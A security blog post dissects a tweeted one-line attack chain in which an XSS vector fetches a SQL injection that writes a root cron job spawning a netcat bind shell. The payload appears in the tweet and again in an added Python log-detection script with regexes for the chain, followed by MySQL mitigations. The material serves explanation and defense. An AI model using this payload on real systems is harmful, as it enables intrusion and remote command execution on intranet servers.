Since the very first days of the world wide web, web applications have been a prime target for hackers. New ways to interact with systems via the HTTP protocol and related technologies gave rise to a whole set of attacks. But until now, some of them remain very special: Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Structured Query Language injection (SQLi) and Remote Code Execution (RCE).
As you may imagine, they are listed in ascending order of danger, with the first three all capable of leading to the last one, RCE. XSS and CSRF are widespread and overlooked, while SQLi and RCE, although less prevalent, are much more deadly. In theory, it’s possible to mount an attack using all of them at the same time, in an interesting analogy to the four horsemen of the apocalypse.
<svg onload=fetch("//HOST/?id=0+union+select'*+*+*+*+*+root+/bin/nc+-lp53+-e+/bin/sh'into+outfile'/etc/cron.d/s'")> pic.twitter.com/uIo3i6IFzg
— Brute Logic (@brutelogic) September 13, 2016
Let’s analyze this. We have a common XSS vector, “<svg onload”, with a simple GET request to a HOST made by the fetch() API. The address used is (theoretically) vulnerable to SQLi by means of the id parameter in the default index page. Of course, this would only make sense if the attacker or tester is not able to make that request by him/herself.
So we also have a cross-site scenario: an XSS payload executing in an internal network, for example, where only the victim can make requests to HOST, our target. Another requirement is that MySQL (in our example) runs as root, which would be hard to find in the wild but not in intranets, where there can be personal or development servers.
So with a “SELECT INTO OUTFILE” SQL statement, a cron job is created (/etc/cron.d/s) and scheduled on the target machine to run every minute (* * * * *) as root, executing a dangerous version of netcat (one that supports the -e flag). This spawns a shell (/bin/sh) listening on port 53 (-lp53), the port used for DNS, which is more likely to be allowed through a firewall (after port 80). A better approach would be to make a reverse connection to the attacker/tester, but with only 140 characters to tweet (less the ones taken by the pic), it seems enough to prove a point: RCE.
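From the defender's side, the whole chain above is visible in a single HTTP request: the query string carries a UNION SELECT, an INTO OUTFILE and a path under /etc/cron.d. The following Python script is an added example, not code from the post or from Brute Logic; it URL-decodes request targets from constructed web-server log lines and alerts only when a SQL read indicator and a file-write indicator appear together, escalating when the target path is a cron directory or a shell/netcat binary is named. The log lines, IP addresses and indicator names are all constructed for the example.

```python
"""Added detection example: flag SQLi-to-file-write requests such as the
UNION SELECT ... INTO OUTFILE '/etc/cron.d/...' chain in the tweet above.
Not the post's code; all sample log lines below are constructed."""
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (Common Log Format), not real traffic.
# Line 2 is the payload from the tweet with '+' encoding; line 4 is the same
# payload percent-encoded; lines 1, 3 and 5 are benign requests that contain
# SQL-looking words so the combination rule below can be exercised.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Sep/2016:10:00:01 +0000] "GET /?id=42 HTTP/1.1" 200 512
10.0.0.5 - - [13/Sep/2016:10:00:02 +0000] "GET /?id=0+union+select'*+*+*+*+*+root+/bin/nc+-lp53+-e+/bin/sh'into+outfile'/etc/cron.d/s' HTTP/1.1" 200 128
10.0.0.7 - - [13/Sep/2016:10:00:03 +0000] "GET /search?q=select+a+book HTTP/1.1" 200 2048
10.0.0.9 - - [13/Sep/2016:10:00:04 +0000] "GET /?id=0%20union%20select%27*%20*%20*%20*%20*%20root%20/bin/nc%20-lp53%20-e%20/bin/sh%27into%20outfile%27/etc/cron.d/s%27 HTTP/1.1" 200 128
10.0.0.8 - - [13/Sep/2016:10:00:05 +0000] "GET /docs?name=report+outfile HTTP/1.1" 200 900
"""

# Request line inside a CLF entry: method, target, protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Each indicator is one sign of the chain; a single one is weak evidence
# (a search for "select a book" is normal), so alerts need a SQL read
# indicator plus a file-write indicator in the same request.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "into_outfile": re.compile(r"\binto\s+(out|dump)file\b", re.I),
    "cron_path": re.compile(r"/etc/cron", re.I),
    "shell_binary": re.compile(r"/bin/(nc|sh|bash)\b", re.I),
}


def classify(target):
    """Decode a request target's query string and return
    (severity, matched indicator names, decoded query)."""
    # unquote_plus handles both '+' and %XX encodings, so the two encodings
    # of the same payload in SAMPLE_LOG decode to identical text.
    decoded = unquote_plus(urlsplit(target).query)
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    if "union_select" in hits and "into_outfile" in hits:
        # Read + write = an attempt to drop a file via the database server.
        if "cron_path" in hits or "shell_binary" in hits:
            severity = "critical"   # file write aimed at code execution
        else:
            severity = "high"
    else:
        severity = "none"
    return severity, hits, decoded


def scan_log(text):
    """Return one alert dict per log line whose request matches the chain."""
    alerts = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        severity, hits, decoded = classify(m.group("target"))
        if severity != "none":
            alerts.append({
                "client": line.split()[0],
                "severity": severity,
                "indicators": hits,
                "decoded": decoded,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["severity"], alert["client"], alert["indicators"])
        print("  ", alert["decoded"])
```

Run against the constructed log, only the two encodings of the tweet's payload are reported, both as critical, while the benign "select a book" and "report outfile" requests are ignored because they carry one indicator each. Decoding before matching is the important step: a WAF or log rule that inspects the raw query string sees `+` and `%27` rather than spaces and quotes. On the database side, the chain also depends on the conditions the post names (the MySQL process running as root, so that a file under /etc/cron.d is writable); restricting where INTO OUTFILE may write with MySQL's secure_file_priv setting and not granting the FILE privilege to the application's account remove the write step even when the injection itself is present.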
Here is a video of this exploitation in a local virtual network with all steps to reproduce here (but it’s old).